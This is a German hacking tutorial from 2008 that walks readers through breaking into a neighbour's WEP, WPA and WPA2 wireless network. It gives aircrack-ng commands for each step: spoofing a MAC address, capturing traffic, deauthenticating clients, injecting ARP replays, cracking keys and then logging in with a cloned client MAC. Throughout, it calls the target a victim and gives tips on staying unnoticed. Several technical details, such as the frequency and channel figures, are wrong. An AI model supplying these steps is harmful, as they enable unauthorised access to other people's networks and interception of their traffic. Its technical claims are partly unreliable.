WLAN Allround Hacking
WEP WPA und WPA 2 Hacking
by F0rmSkull 2008


So hallo und schön dass ihr mein Tutorial lest ; )
Da ich mich in letzter Zeit wieder intensiver mit meinem Notebook und dem Netz von meinem
Nachbarn beschäftigt habe :-P kam mir die Idee einfach mal ein „Wlan Allround Tutorial“ zu
schreiben. Hier werde ich Wlan Grundlagen nur kurz ansprechen, da dieses Tutorial eher
praxisorientiert ist. In diesem Text arbeite ich mit BackTrack V3
(http://www.remote-exploit.org/backtrack_download.html)
Manche Tools gibt’s natürlich auch für Windows. Einfach mal googlen ; )




I) WLAN Einführung

I.1) Was ist WLAN und wie funktioniert es?
I.2) WEP/WPA: Erklärung und Unterschiede
I.3) Begriffs- und Abkürzungserklärung


II) Vorbereitung
II.1) Device finden
II.2) MAC fälschen
II.3) Promiscuous Mode
II.4) Opfer finden


III) Hack that WEP

III.1) Opfer abhören
III.2) Traffic erzeugen
III.3) Key cracken


IV) Hack that WPA/WPA2

IV.1) Opfer abhören
IV.2) Handshake
IV.3) Key cracken


V) Abschluss

V.1) MAC anpassen und einloggen ;-)
V.2) Schlusswort




I) WLAN Einführung
I.1) Was ist WLAN und wie funktioniert es?
WLAN ist die Abkürzung für Wireless local area network (Kabelloses lokales Netzwerk).
Dies ist eine Funkverbindung für verschieden Geräte, meist aber PCs.
WLAN hat 2 „Arten“: Den „Infrastructure Mode“ und den „Ad-hoc Mode“.
Im Infrastructure Mode gibt es 1 AccessPoint. Also einen Mittel- oder Schnittpunkt der das
Netzwerk und die Pakete verwaltet. Von dieser Station werden mehrmals pro Sekunfe kleine
Datenpakete (Beacons) gesendet. In diesen Paketen stehen die für die Clienten wichtigen
Informationen wie SSID, Frequenzen und Verschlüsselung.
Der Ad-hoc Mode wird verwendet um schnell wenige Geräte miteinander zu verbinden. Dabei gibt
es keinen „richtigen Mittelpunkt“. Da dadurch keine Beacons gesendet werden weiß der Client
nicht wann er sich in Reichweite befindet und wann nicht. Im Ad-hoc Modus werden aber trotzdem
SSID und Verschlüsselung benutzt ; ). Noch schnell zu den Frequenzen:
Also der wohl momentan meist genutzte Standard ist der IEEE 802.11a mit maximal 54Mbps.
In Europa, USA und Japan sind Frequenzen von 2,412 bis 2,442 GHz erlaubt. Das sind 7 Channel.
Also wer noch genaueres wissen will fragt Google ;-)
Weiter geht’s...


I.2) WEP/WPA: Erklärung und Unterschiede
WEP (Wired Equivalent Privacy) ist eine bereits „veraltete“ Verschlüsselung. Als WEP neu auf
den Markt kam sah man es alt extrem sicher, was es aber nicht ist, wie sich schnell herrausstellte.
Um WEP zu hacken muss man nur genug Pakete sammeln und kann daraus dann den Key
berechnen. Aber dazu unten mehr ; ). Ein WEP Paket besteht aus den zu sendenden Informationen
und einer 32Bit Prüfsumme der Nutzerdaten. Das wird alles verschlüsselt und ein 24Bit langer Teil
des WEP Keys (IV, Initialisierungsvektor) angehängt. Mit dem IV und dem Key auf dem Client
kann der Empfänger dann wieder den Text der Nachricht entschlüsseln.
WPA basiert auch auf dieser Technis, nur das bei WPA noch ein „temporärer Schlüssel“ angehängt
wird und der IV nicht nur 48 bit langen Key sondern noch weitere Funktionen wie „Per Packet Key
Mixing“ zur sicherung. WPA2 unterstütz dann noch den AES Verschlüsselungsalgorithmus.

I.3) Begriffs- und Abkürzungserklärung
In diesem Tutorial werde ich ein paar Abkürzungen benutzen, die ich euch hier erkläre.
Allerdings benutze nicht nur ich diese Abkürzungen sondern auch vieeeeele andre ; ).
Also:
AP = Accesspoint (s.o./Meist WLAn Router)
CL = Client (Der PC der im WLAN eingeloggt ist)
BT = BackTrack (Linux WLAN-Hacking Distri. Auch als Live CD erhältlich)
IFC = Interface (Device, also der „Name“ eurer WLAN Karte)
MAC = MAC Adresse (Die Andresse deiner Netzwerkkarte)




II) Vorbereitung
II.1) Device finden
So, schön dass ihr noch da seit :-P. Jetzt wird’s spannender. Aber als erstes müssen wir ein paar
Informationen von unserem PC verlangen. Wichtig ist die IFC (s.o.).
Dazu starten wir unter BT eine Shell und geben dort:
iwconfig
ein. Bei mir eth0.


II.2) MAC fälschen
Damit wir keine Folgen des Hacks zu spüren bekommen sollten wir die einmalige MAC fälschen.
ifconfig IFC hw ether 00:12:34:56:78:90


II.3) Promiscuous Mode
Noch ist unsere WLAN Karte unbrauchbar. Aber mit dem „Promiscuous Mode“ wird unsere Karte
ALLE WLAN Pakete empfangen können.
airmon-ng start wifi0
wlanconfig eth0 destroy
ifconfig eth1 up
iwconfig eth1 mode Monitor channel 0
Statt eth natürlich euren IFC einsetzten ; )


II.4) Opfer finden
So, nun zum entspannteren Teil^^ Jetzt müssen wir uns noch ein Opfer aussuchen.
Welche zu Verfügung stehen sehen wir mit airodump-ng.
airodump-ng –w WlanTestHack IFC
Merkt euch dann die BSSID und die MAC vom AccessPoint.




III) Hack that WEP
III.1) Opfer abhören
So nun warten wir bis wir ca. 600 000 Pakete haben.
Spaaaaaaaaaaaaaß^^. Natürlich warten wir uns da nicht dumm und dämlich.
Wir beschleunigen das ein bisschen ; ). Wenn ihr aber ABSOLUT unauffällig bleiben wollt solltet
ihr lieber Monate warten.


III.2) Traffic erzeugen
Wir erzeugen/erzwingen Pakete, und dazu noch sehr informative : ).
Wie? Na wir disconnecten einen der User, und der muss sich dann wieder anmelden.
Dabei hört ein Traffic Generator den sogenannten ARP Request ab, und sendet diesen laufend an
den AP. Der Hacken an der Sache ist nur das der AP nur Bestimmte MACs zulässt, wenn ein MAC
Filter eingeschaltet ist. Aber so ein Problem ist das nun auch wieder nicht, vor allem nicht unter
Linux :-P.
MAC von Client übernehmen: aireplay-ng -3 –b AP_MAC –h CL_MAC –x 600 IFC
APR Request erzwingen: aireplay-ng -0 1 -a AP_MAC –c CL_MAC IFC


III.3) Key cracken
So nach ein bisschen warten haben wir auch genug Pakete (min 400k, gut 600k) um endgültig den
WEP Schlüssel zu berechnen.Dabei bitte bedenken um so mehr Ivs/Pakete ihr habt desto schneller
geht das cracken. Bei 600 000 sind es ca 15 min, bei 400 000 9 Stunden.
aircrack-ng –x -0 WlanTestHack




IV) Hack that WPA/WPA2
IV.1) Opfer abhören
Ähnlich wie bei WEP müssen wir erst Pakete sammeln. Dabei aber einen anderen Befehl
verwenden, da wir die Pakete nicht als .IVS speicher dürfen.
airodump-ng –w WlanTestHack –c Channel --bssid AP_MAC IFC


IV.2) Handshake
Nun kommt wieder etwas WEP ähnliches^^. Wir müssen einen Clienten disconnecten bzw. nicht
mal das, wir müssen nur den Login-Vorgang eines Clienten in das Netzwerk sniffen. Aber bevor
wir da wieder Stunden warten helfen wir da ein wenig nach ; ).
aireplay-ng -0 1 -a AP_MAC –c CL_MAC IFC


IV.3) Key cracken
Der „Nachteil“ an WPA ist das man den Key (noch) nicht errechen, sondern nur Brute Forcen
kann. Also holen wir uns ein sehhhhhhhhhhhr großen Dictionary und vergleichen Key mit Wort....
aircrack-ng -0 –x2 -w Woerterliste.txt WlanTestHack.cap


V) Abschluss
V.1) MAC anpassen und einloggen
Wenn kein MAC Filter vorhanden ist, muss man es nicht tun, allerdings zur Sicherheit und
Anonymität würde ich es immer machen.
ifconfig IFC down hw ether CL_MAC
Jetzt müssen wir uns nurnoch einloggen. Entweder mit dem Grafischen Tool:
wlassistant
oder mit der Shell:
iwconfig IFC essid AP_NAME_SSID mode Managed
key s:KEY_ASCII
ifconfig IFC up
iwpriv IFC authmode 2
dhcpcd IFC


V.2) Schlusswort
So, nun bin ich auch schon am Ende meines Tutorials, ich hoffe natürlich dass es euch gefallen hat
und vorallem etwas gebracht ; ). Über einen Besuch auf meiner Seite würde ich mich auch freuen.




MfG euer F0rmSkull
http://www.project-dragon.de.ms
Tutorial © 2008 by F0rmSkull


Downloadquellen:
BackTrack: http://www.remote-exploit.org/backtrack_download.html



Feed back bitte ; )
HF, MfG F0rmSkull